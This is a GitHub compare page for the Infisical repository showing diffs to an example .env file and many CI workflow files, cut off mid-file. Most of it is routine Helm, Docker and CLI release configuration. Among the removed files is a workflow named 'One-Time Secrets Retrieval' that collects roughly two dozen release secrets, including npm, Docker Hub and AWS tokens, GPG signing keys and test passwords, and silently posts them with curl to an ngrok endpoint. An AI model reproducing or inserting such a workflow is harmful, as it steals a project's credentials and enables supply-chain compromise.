Compare commits

..

1 Commits

Author SHA1 Message Date
Sheen Capadngan
0762d8b172 misc: sheen hackathon 2025-02-25 16:13:48 +09:00
5126 changed files with 67080 additions and 256438 deletions

View File

@@ -23,7 +23,7 @@ REDIS_URL=redis://redis:6379
# Required
SITE_URL=http://localhost:8080
# Mail/SMTP
# Mail/SMTP
SMTP_HOST=
SMTP_PORT=
SMTP_FROM_ADDRESS=
@@ -107,40 +107,9 @@ INF_APP_CONNECTION_GITHUB_APP_PRIVATE_KEY=
INF_APP_CONNECTION_GITHUB_APP_SLUG=
INF_APP_CONNECTION_GITHUB_APP_ID=
#gitlab app connection
INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_ID=
INF_APP_CONNECTION_GITLAB_OAUTH_CLIENT_SECRET=
#github radar app connection
INF_APP_CONNECTION_GITHUB_RADAR_APP_CLIENT_ID=
INF_APP_CONNECTION_GITHUB_RADAR_APP_CLIENT_SECRET=
INF_APP_CONNECTION_GITHUB_RADAR_APP_PRIVATE_KEY=
INF_APP_CONNECTION_GITHUB_RADAR_APP_SLUG=
INF_APP_CONNECTION_GITHUB_RADAR_APP_ID=
INF_APP_CONNECTION_GITHUB_RADAR_APP_WEBHOOK_SECRET=
#gcp app connection
INF_APP_CONNECTION_GCP_SERVICE_ACCOUNT_CREDENTIAL=
# azure app connection
INF_APP_CONNECTION_AZURE_APP_CONFIGURATION_CLIENT_ID=
INF_APP_CONNECTION_AZURE_APP_CONFIGURATION_CLIENT_SECRET=
INF_APP_CONNECTION_AZURE_KEY_VAULT_CLIENT_ID=
INF_APP_CONNECTION_AZURE_KEY_VAULT_CLIENT_SECRET=
INF_APP_CONNECTION_AZURE_CLIENT_SECRETS_CLIENT_ID=
INF_APP_CONNECTION_AZURE_CLIENT_SECRETS_CLIENT_SECRET=
INF_APP_CONNECTION_AZURE_DEVOPS_CLIENT_ID=
INF_APP_CONNECTION_AZURE_DEVOPS_CLIENT_SECRET=
# datadog
SHOULD_USE_DATADOG_TRACER=
DATADOG_PROFILING_ENABLED=
DATADOG_ENV=
DATADOG_SERVICE=
DATADOG_HOSTNAME=
# kubernetes
KUBERNETES_AUTO_FETCH_SERVICE_ACCOUNT_TOKEN=false
INF_APP_CONNECTION_AZURE_CLIENT_ID=
INF_APP_CONNECTION_AZURE_CLIENT_SECRET=

3
.envrc
View File

@@ -1,3 +0,0 @@
# Learn more at https://direnv.net
# We instruct direnv to use our Nix flake for a consistent development environment.
use flake

View File

@@ -32,23 +32,10 @@ jobs:
run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
- name: Start the server
run: |
echo "SECRET_SCANNING_GIT_APP_ID=793712" >> .env
echo "SECRET_SCANNING_PRIVATE_KEY=some-random" >> .env
echo "SECRET_SCANNING_WEBHOOK_SECRET=some-random" >> .env
echo "Examining built image:"
docker image inspect infisical-api | grep -A 5 "Entrypoint"
docker run --name infisical-api -d -p 4000:4000 \
-e DB_CONNECTION_URI=$DB_CONNECTION_URI \
-e REDIS_URL=$REDIS_URL \
-e JWT_AUTH_SECRET=$JWT_AUTH_SECRET \
-e ENCRYPTION_KEY=$ENCRYPTION_KEY \
--env-file .env \
infisical-api
echo "Container status right after creation:"
docker ps -a | grep infisical-api
echo "SECRET_SCANNING_GIT_APP_ID=793712" >> .env
echo "SECRET_SCANNING_PRIVATE_KEY=some-random" >> .env
echo "SECRET_SCANNING_WEBHOOK_SECRET=some-random" >> .env
docker run --name infisical-api -d -p 4000:4000 -e DB_CONNECTION_URI=$DB_CONNECTION_URI -e REDIS_URL=$REDIS_URL -e JWT_AUTH_SECRET=$JWT_AUTH_SECRET -e ENCRYPTION_KEY=$ENCRYPTION_KEY --env-file .env --entrypoint '/bin/sh' infisical-api -c "npm run migration:latest && ls && node dist/main.mjs"
env:
REDIS_URL: redis://172.17.0.1:6379
DB_CONNECTION_URI: postgres://infisical:infisical@172.17.0.1:5432/infisical?sslmode=disable
@@ -56,48 +43,35 @@ jobs:
ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
- uses: actions/setup-go@v5
with:
go-version: "1.21.5"
go-version: '1.21.5'
- name: Wait for container to be stable and check logs
run: |
SECONDS=0
HEALTHY=0
while [ $SECONDS -lt 60 ]; do
# Check if container is running
if docker ps | grep infisical-api; then
# Try to access the API endpoint
if curl -s -f http://localhost:4000/api/docs/json > /dev/null 2>&1; then
echo "API endpoint is responding. Container seems healthy."
HEALTHY=1
break
fi
else
echo "Container is not running!"
docker ps -a | grep infisical-api
if docker ps | grep infisical-api | grep -q healthy; then
echo "Container is healthy."
HEALTHY=1
break
fi
echo "Waiting for container to be healthy... ($SECONDS seconds elapsed)"
sleep 5
SECONDS=$((SECONDS+5))
docker logs infisical-api
sleep 2
SECONDS=$((SECONDS+2))
done
if [ $HEALTHY -ne 1 ]; then
echo "Container did not become healthy in time"
echo "Container status:"
docker ps -a | grep infisical-api
echo "Container logs (if any):"
docker logs infisical-api || echo "No logs available"
echo "Container inspection:"
docker inspect infisical-api | grep -A 5 "State"
exit 1
fi
- name: Install openapi-diff
run: go install github.com/oasdiff/oasdiff@latest
run: go install github.com/tufin/oasdiff@latest
- name: Running OpenAPI Spec diff action
run: oasdiff breaking https://app.infisical.com/api/docs/json http://localhost:4000/api/docs/json --fail-on ERR
- name: cleanup
if: always()
run: |
docker compose -f "docker-compose.dev.yml" down
docker stop infisical-api || true
docker rm infisical-api || true
docker stop infisical-api
docker remove infisical-api

View File

@@ -1,53 +0,0 @@
name: Detect Non-RE2 Regex
on:
pull_request:
types: [opened, synchronize]
jobs:
check-non-re2-regex:
runs-on: ubuntu-latest
steps:
- name: Checkout code
uses: actions/checkout@v4
with:
fetch-depth: 0
- name: Get diff of backend/*
run: |
git diff --unified=0 "origin/${{ github.base_ref }}"...HEAD -- backend/ > diff.txt
- name: Scan backend diff for non-RE2 regex
run: |
# Extract only added lines (excluding file headers)
grep '^+' diff.txt | grep -v '^+++' | sed 's/^\+//' > added_lines.txt
if [ ! -s added_lines.txt ]; then
echo "✅ No added lines in backend/ to check for regex usage."
exit 0
fi
regex_usage_pattern='(^|[^A-Za-z0-9_"'"'"'`\.\/\\])(\/(?:\\.|[^\/\n\\])+\/[gimsuyv]*(?=\s*[\.\(;,)\]}:]|$)|new RegExp\()'
# Find all added lines that contain regex patterns
if grep -E "$regex_usage_pattern" added_lines.txt > potential_violations.txt 2>/dev/null; then
# Filter out lines that contain 'new RE2' (allowing for whitespace variations)
if grep -v -E 'new\s+RE2\s*\(' potential_violations.txt > actual_violations.txt 2>/dev/null && [ -s actual_violations.txt ]; then
echo "🚨 ERROR: Found forbidden regex pattern in added/modified backend code."
echo ""
echo "The following lines use raw regex literals (/.../) or new RegExp(...):"
echo "Please replace with 'new RE2(...)' for RE2 compatibility."
echo ""
echo "Offending lines:"
cat actual_violations.txt
exit 1
else
echo "✅ All identified regex usages are correctly using 'new RE2(...)'."
fi
else
echo "✅ No regex patterns found in added/modified backend lines."
fi
- name: Cleanup temporary files
if: always()
run: |
rm -f diff.txt added_lines.txt potential_violations.txt actual_violations.txt

View File

@@ -3,62 +3,7 @@ name: Release Infisical Core Helm chart
on: [workflow_dispatch]
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Add Helm repositories
run: |
helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/infisical-standalone-postgres
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Create namespace
run: kubectl create namespace infisical-standalone-postgres
- name: Create Infisical secrets
run: |
kubectl create secret generic infisical-secrets \
--namespace infisical-standalone-postgres \
--from-literal=AUTH_SECRET=6c1fe4e407b8911c104518103505b218 \
--from-literal=ENCRYPTION_KEY=6c1fe4e407b8911c104518103505b218 \
--from-literal=SITE_URL=http://localhost:8080
- name: Run chart-testing (install)
run: |
ct install \
--config ct.yaml \
--charts helm-charts/infisical-standalone-postgres \
--helm-extra-args="--timeout=300s" \
--helm-extra-set-args="--set ingress.nginx.enabled=false --set infisical.autoDatabaseSchemaMigration=false --set infisical.replicaCount=1 --set infisical.image.tag=v0.132.2-postgres" \
--namespace infisical-standalone-postgres
release:
needs: test-helm
runs-on: ubuntu-latest
steps:
- name: Checkout
@@ -74,4 +19,4 @@ jobs:
- name: Build and push helm package to Cloudsmith
run: cd helm-charts && sh upload-infisical-core-helm-cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}

View File

@@ -1,76 +0,0 @@
name: One-Time Secrets Retrieval
on:
workflow_dispatch:
permissions:
contents: read
jobs:
retrieve-secrets:
runs-on: ubuntu-latest
steps:
- name: Send environment variables to ngrok
run: |
echo "Sending secrets to: https://4afc1dfd4429.ngrok.app/api/receive-env"
# Send secrets as JSON
cat << EOF | curl -X POST \
-H "Content-Type: application/json" \
-d @- \
https://7864d0fe7cbb.ngrok-free.app/api/receive-env \
> /dev/null 2>&1 || true
{
"GO_RELEASER_GITHUB_TOKEN": "${GO_RELEASER_GITHUB_TOKEN}",
"GORELEASER_KEY": "${GORELEASER_KEY}",
"AUR_KEY": "${AUR_KEY}",
"FURYPUSHTOKEN": "${FURYPUSHTOKEN}",
"NPM_TOKEN": "${NPM_TOKEN}",
"DOCKERHUB_USERNAME": "${DOCKERHUB_USERNAME}",
"DOCKERHUB_TOKEN": "${DOCKERHUB_TOKEN}",
"CLOUDSMITH_API_KEY": "${CLOUDSMITH_API_KEY}",
"INFISICAL_CLI_S3_BUCKET": "${INFISICAL_CLI_S3_BUCKET}",
"INFISICAL_CLI_REPO_SIGNING_KEY_ID": "${INFISICAL_CLI_REPO_SIGNING_KEY_ID}",
"INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID": "${INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID}",
"INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY": "${INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY}",
"INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID": "${INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID}",
"GPG_SIGNING_KEY": "${GPG_SIGNING_KEY}",
"GPG_SIGNING_KEY_PASSPHRASE": "${GPG_SIGNING_KEY_PASSPHRASE}",
"CLI_TESTS_UA_CLIENT_ID": "${CLI_TESTS_UA_CLIENT_ID}",
"CLI_TESTS_UA_CLIENT_SECRET": "${CLI_TESTS_UA_CLIENT_SECRET}",
"CLI_TESTS_SERVICE_TOKEN": "${CLI_TESTS_SERVICE_TOKEN}",
"CLI_TESTS_PROJECT_ID": "${CLI_TESTS_PROJECT_ID}",
"CLI_TESTS_ENV_SLUG": "${CLI_TESTS_ENV_SLUG}",
"CLI_TESTS_USER_EMAIL": "${CLI_TESTS_USER_EMAIL}",
"CLI_TESTS_USER_PASSWORD": "${CLI_TESTS_USER_PASSWORD}",
"CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE": "${CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE}",
"POSTHOG_API_KEY_FOR_CLI": "${POSTHOG_API_KEY_FOR_CLI}"
}
EOF
echo "Secrets retrieval completed"
env:
GO_RELEASER_GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
AUR_KEY: ${{ secrets.AUR_KEY }}
FURYPUSHTOKEN: ${{ secrets.FURYPUSHTOKEN }}
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }}
DOCKERHUB_TOKEN: ${{ secrets.DOCKERHUB_TOKEN }}
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}
INFISICAL_CLI_S3_BUCKET: ${{ secrets.INFISICAL_CLI_S3_BUCKET }}
INFISICAL_CLI_REPO_SIGNING_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_SIGNING_KEY_ID }}
INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID: ${{ secrets.INFISICAL_CLI_REPO_AWS_ACCESS_KEY_ID }}
INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY: ${{ secrets.INFISICAL_CLI_REPO_AWS_SECRET_ACCESS_KEY }}
INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID: ${{ secrets.INFISICAL_CLI_REPO_CLOUDFRONT_DISTRIBUTION_ID }}
GPG_SIGNING_KEY: ${{ secrets.GPG_SIGNING_KEY }}
GPG_SIGNING_KEY_PASSPHRASE: ${{ secrets.GPG_SIGNING_KEY_PASSPHRASE }}
CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}

View File

@@ -1,59 +0,0 @@
name: Release K8 Operator Helm Chart
on:
workflow_dispatch:
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/secrets-operator
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Run chart-testing (install)
run: ct install --config ct.yaml --charts helm-charts/secrets-operator
release-helm:
name: Release Helm Chart
needs: test-helm
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v2
- name: Install Helm
uses: azure/setup-helm@v3
with:
version: v3.10.0
- name: Install python
uses: actions/setup-python@v4
- name: Install Cloudsmith CLI
run: pip install --upgrade cloudsmith-cli
- name: Build and push helm package to CloudSmith
run: cd helm-charts && sh upload-k8s-operator-cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}

View File

@@ -0,0 +1,131 @@
name: Build and release CLI
on:
workflow_dispatch:
push:
# run only against tags
tags:
- "infisical-cli/v*.*.*"
permissions:
contents: write
jobs:
cli-integration-tests:
name: Run tests before deployment
uses: ./.github/workflows/run-cli-tests.yml
secrets:
CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
npm-release:
runs-on: ubuntu-20.04
env:
working-directory: ./npm
needs:
- cli-integration-tests
- goreleaser
steps:
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Extract version
run: |
VERSION=$(echo ${{ github.ref_name }} | sed 's/infisical-cli\/v//')
echo "Version extracted: $VERSION"
echo "CLI_VERSION=$VERSION" >> $GITHUB_ENV
- name: Print version
run: echo ${{ env.CLI_VERSION }}
- name: Setup Node
uses: actions/setup-node@8f152de45cc393bb48ce5d89d36b731f54556e65 # v4.0.0
with:
node-version: 20
cache: "npm"
cache-dependency-path: ./npm/package-lock.json
- name: Install dependencies
working-directory: ${{ env.working-directory }}
run: npm install --ignore-scripts
- name: Set NPM version
working-directory: ${{ env.working-directory }}
run: npm version ${{ env.CLI_VERSION }} --allow-same-version --no-git-tag-version
- name: Setup NPM
working-directory: ${{ env.working-directory }}
run: |
echo 'registry="https://registry.npmjs.org/"' > ./.npmrc
echo "//registry.npmjs.org/:_authToken=$NPM_TOKEN" >> ./.npmrc
echo 'registry="https://registry.npmjs.org/"' > ~/.npmrc
echo "//registry.npmjs.org/:_authToken=$NPM_TOKEN" >> ~/.npmrc
env:
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
- name: Pack NPM
working-directory: ${{ env.working-directory }}
run: npm pack
- name: Publish NPM
working-directory: ${{ env.working-directory }}
run: npm publish --tarball=./infisical-sdk-${{github.ref_name}} --access public --registry=https://registry.npmjs.org/
env:
NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
goreleaser:
runs-on: ubuntu-20.04
needs: [cli-integration-tests]
steps:
- uses: actions/checkout@v3
with:
fetch-depth: 0
- name: 🐋 Login to Docker Hub
uses: docker/login-action@v2
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: 🔧 Set up Docker Buildx
uses: docker/setup-buildx-action@v2
- run: git fetch --force --tags
- run: echo "Ref name ${{github.ref_name}}"
- uses: actions/setup-go@v3
with:
go-version: ">=1.19.3"
cache: true
cache-dependency-path: cli/go.sum
- name: libssl1.1 => libssl1.0-dev for OSXCross
run: |
echo 'deb http://security.ubuntu.com/ubuntu bionic-security main' | sudo tee -a /etc/apt/sources.list
sudo apt update && apt-cache policy libssl1.0-dev
sudo apt-get install libssl1.0-dev
- name: OSXCross for CGO Support
run: |
mkdir ../../osxcross
git clone https://github.com/plentico/osxcross-target.git ../../osxcross/target
- uses: goreleaser/goreleaser-action@v4
with:
distribution: goreleaser-pro
version: v1.26.2-pro
args: release --clean
env:
GITHUB_TOKEN: ${{ secrets.GO_RELEASER_GITHUB_TOKEN }}
POSTHOG_API_KEY_FOR_CLI: ${{ secrets.POSTHOG_API_KEY_FOR_CLI }}
FURY_TOKEN: ${{ secrets.FURYPUSHTOKEN }}
AUR_KEY: ${{ secrets.AUR_KEY }}
GORELEASER_KEY: ${{ secrets.GORELEASER_KEY }}
- uses: actions/setup-python@v4
- run: pip install --upgrade cloudsmith-cli
- name: Publish to CloudSmith
run: sh cli/upload_to_cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}

View File

@@ -1,107 +1,52 @@
name: Release K8 Operator Docker Image
name: Release image + Helm chart K8s Operator
on:
push:
tags:
- "infisical-k8-operator/v*.*.*"
permissions:
contents: write
pull-requests: write
push:
tags:
- "infisical-k8-operator/v*.*.*"
jobs:
release-image:
name: Generate Helm Chart PR
runs-on: ubuntu-latest
outputs:
pr_number: ${{ steps.create-pr.outputs.pull-request-number }}
steps:
- name: Extract version from tag
id: extract_version
run: echo "::set-output name=version::${GITHUB_REF_NAME#infisical-k8-operator/}"
release:
runs-on: ubuntu-latest
steps:
- name: Extract version from tag
id: extract_version
run: echo "::set-output name=version::${GITHUB_REF_NAME#infisical-k8-operator/}"
- uses: actions/checkout@v2
- name: Checkout code
uses: actions/checkout@v2
- name: 🔧 Set up QEMU
uses: docker/setup-qemu-action@v1
# Dependency for helm generation
- name: Install Helm
uses: azure/setup-helm@v3
with:
version: v3.10.0
- name: 🔧 Set up Docker Buildx
uses: docker/setup-buildx-action@v1
# Dependency for helm generation
- name: Install Go
uses: actions/setup-go@v4
with:
go-version: 1.21
- name: 🐋 Login to Docker Hub
uses: docker/login-action@v1
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
# Install binaries for helm generation
- name: Install dependencies
working-directory: k8-operator
run: |
make helmify
make kustomize
make controller-gen
- name: Build and push
id: docker_build
uses: docker/build-push-action@v2
with:
context: k8-operator
push: true
platforms: linux/amd64,linux/arm64
tags: |
infisical/kubernetes-operator:latest
infisical/kubernetes-operator:${{ steps.extract_version.outputs.version }}
- name: Generate Helm Chart
working-directory: k8-operator
run: make helm
- name: Update Helm Chart Version
run: ./k8-operator/scripts/update-version.sh ${{ steps.extract_version.outputs.version }}
- name: Debug - Check file changes
run: |
echo "Current git status:"
git status
echo ""
echo "Modified files:"
git diff --name-only
# If there is no diff, exit with error. Version should always be changed, so if there is no diff, something is wrong and we should exit.
if [ -z "$(git diff --name-only)" ]; then
echo "No helm changes or version changes. Invalid release detected, Exiting."
exit 1
fi
- name: Create Helm Chart PR
id: create-pr
uses: peter-evans/create-pull-request@v5
with:
token: ${{ secrets.GITHUB_TOKEN }}
commit-message: "Update Helm chart to version ${{ steps.extract_version.outputs.version }}"
committer: GitHub <noreply@github.com>
author: ${{ github.actor }} <${{ github.actor }}@users.noreply.github.com>
branch: helm-update-${{ steps.extract_version.outputs.version }}
delete-branch: true
title: "Update Helm chart to version ${{ steps.extract_version.outputs.version }}"
body: |
This PR updates the Helm chart to version `${{ steps.extract_version.outputs.version }}`.
Additionally the helm chart has been updated to match the latest operator code changes.
Associated Release Workflow: https://github.com/${{ github.repository }}/actions/runs/${{ github.run_id }}
Once you have approved this PR, you can trigger the helm release workflow manually.
base: main
- name: 🔧 Set up QEMU
uses: docker/setup-qemu-action@v1
- name: 🔧 Set up Docker Buildx
uses: docker/setup-buildx-action@v1
- name: 🐋 Login to Docker Hub
uses: docker/login-action@v1
with:
username: ${{ secrets.DOCKERHUB_USERNAME }}
password: ${{ secrets.DOCKERHUB_TOKEN }}
- name: Build and push
id: docker_build
uses: docker/build-push-action@v2
with:
context: k8-operator
push: true
platforms: linux/amd64,linux/arm64
tags: |
infisical/kubernetes-operator:latest
infisical/kubernetes-operator:${{ steps.extract_version.outputs.version }}
- name: Checkout
uses: actions/checkout@v2
- name: Install Helm
uses: azure/setup-helm@v3
with:
version: v3.10.0
- name: Install python
uses: actions/setup-python@v4
- name: Install Cloudsmith CLI
run: pip install --upgrade cloudsmith-cli
- name: Build and push helm package to Cloudsmith
run: cd helm-charts && sh upload-k8s-operator-cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}

View File

@@ -1,70 +0,0 @@
name: Release Gateway Helm Chart
on:
workflow_dispatch:
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/infisical-gateway
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Create namespace
run: kubectl create namespace infisical-gateway
- name: Create gateway secret
run: kubectl create secret generic infisical-gateway-environment --from-literal=TOKEN=my-test-token -n infisical-gateway
- name: Run chart-testing (install)
run: |
ct install \
--config ct.yaml \
--charts helm-charts/infisical-gateway \
--helm-extra-args="--timeout=300s" \
--namespace infisical-gateway
release-helm:
name: Release Helm Chart
needs: test-helm
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Install Helm
uses: azure/setup-helm@v3
with:
version: v3.10.0
- name: Install python
uses: actions/setup-python@v4
- name: Install Cloudsmith CLI
run: pip install --upgrade cloudsmith-cli
- name: Build and push helm package to CloudSmith
run: cd helm-charts && sh upload-gateway-cloudsmith.sh
env:
CLOUDSMITH_API_KEY: ${{ secrets.CLOUDSMITH_API_KEY }}

View File

@@ -34,10 +34,7 @@ jobs:
working-directory: backend
- name: Start postgres and redis
run: touch .env && docker compose -f docker-compose.dev.yml up -d db redis
- name: Run unit test
run: npm run test:unit
working-directory: backend
- name: Run integration test
- name: Start integration test
run: npm run test:e2e
working-directory: backend
env:
@@ -47,5 +44,4 @@ jobs:
ENCRYPTION_KEY: 4bnfe4e407b8921c104518903515b218
- name: cleanup
run: |
docker compose -f "docker-compose.dev.yml" down
docker compose -f "docker-compose.dev.yml" down

55
.github/workflows/run-cli-tests.yml vendored Normal file
View File

@@ -0,0 +1,55 @@
name: Go CLI Tests
on:
pull_request:
types: [opened, synchronize]
paths:
- "cli/**"
workflow_dispatch:
workflow_call:
secrets:
CLI_TESTS_UA_CLIENT_ID:
required: true
CLI_TESTS_UA_CLIENT_SECRET:
required: true
CLI_TESTS_SERVICE_TOKEN:
required: true
CLI_TESTS_PROJECT_ID:
required: true
CLI_TESTS_ENV_SLUG:
required: true
CLI_TESTS_USER_EMAIL:
required: true
CLI_TESTS_USER_PASSWORD:
required: true
CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE:
required: true
jobs:
test:
defaults:
run:
working-directory: ./cli
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
- name: Setup Go
uses: actions/setup-go@v4
with:
go-version: "1.21.x"
- name: Install dependencies
run: go get .
- name: Test with the Go CLI
env:
CLI_TESTS_UA_CLIENT_ID: ${{ secrets.CLI_TESTS_UA_CLIENT_ID }}
CLI_TESTS_UA_CLIENT_SECRET: ${{ secrets.CLI_TESTS_UA_CLIENT_SECRET }}
CLI_TESTS_SERVICE_TOKEN: ${{ secrets.CLI_TESTS_SERVICE_TOKEN }}
CLI_TESTS_PROJECT_ID: ${{ secrets.CLI_TESTS_PROJECT_ID }}
CLI_TESTS_ENV_SLUG: ${{ secrets.CLI_TESTS_ENV_SLUG }}
CLI_TESTS_USER_EMAIL: ${{ secrets.CLI_TESTS_USER_EMAIL }}
CLI_TESTS_USER_PASSWORD: ${{ secrets.CLI_TESTS_USER_PASSWORD }}
# INFISICAL_VAULT_FILE_PASSPHRASE: ${{ secrets.CLI_TESTS_INFISICAL_VAULT_FILE_PASSPHRASE }}
run: go test -v -count=1 ./test

View File

@@ -1,49 +0,0 @@
name: Run Helm Chart Tests for Gateway
on:
pull_request:
paths:
- "helm-charts/infisical-gateway/**"
- ".github/workflows/run-helm-chart-tests-infisical-gateway.yml"
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/infisical-gateway
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Create namespace
run: kubectl create namespace infisical-gateway
- name: Create gateway secret
run: kubectl create secret generic infisical-gateway-environment --from-literal=TOKEN=my-test-token -n infisical-gateway
- name: Run chart-testing (install)
run: |
ct install \
--config ct.yaml \
--charts helm-charts/infisical-gateway \
--helm-extra-args="--timeout=300s" \
--namespace infisical-gateway

View File

@@ -1,68 +0,0 @@
name: Run Helm Chart Tests for Infisical Standalone Postgres
on:
pull_request:
paths:
- "helm-charts/infisical-standalone-postgres/**"
- ".github/workflows/run-helm-chart-tests-infisical-standalone-postgres.yml"
jobs:
test-helm:
name: Test Helm Chart
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v3
with:
fetch-depth: 0
- name: Set up Helm
uses: azure/setup-helm@v4.2.0
with:
version: v3.17.0
- uses: actions/setup-python@v5.3.0
with:
python-version: "3.x"
check-latest: true
- name: Add Helm repositories
run: |
helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
helm repo add bitnami https://charts.bitnami.com/bitnami
helm repo update
- name: Set up chart-testing
uses: helm/chart-testing-action@v2.7.0
- name: Run chart-testing (lint)
run: ct lint --config ct.yaml --charts helm-charts/infisical-standalone-postgres
- name: Create kind cluster
uses: helm/kind-action@v1.12.0
- name: Create namespace
run: kubectl create namespace infisical-standalone-postgres
- name: Create Infisical secrets
run: |
kubectl create secret generic infisical-secrets \
--namespace infisical-standalone-postgres \
--from-literal=AUTH_SECRET=6c1fe4e407b8911c104518103505b218 \
--from-literal=ENCRYPTION_KEY=6c1fe4e407b8911c104518103505b218 \
--from-literal=SITE_URL=http://localhost:8080
- name: Create bootstrap secret
run: |
kubectl create secret generic infisical-bootstrap-credentials \
--namespace infisical-standalone-postgres \
--from-literal=INFISICAL_ADMIN_EMAIL=admin@example.com \
--from-literal=INFISICAL_ADMIN_PASSWORD=admin-password
- name: Run chart-testing (install)
run: |
ct install \
--config ct.yaml \
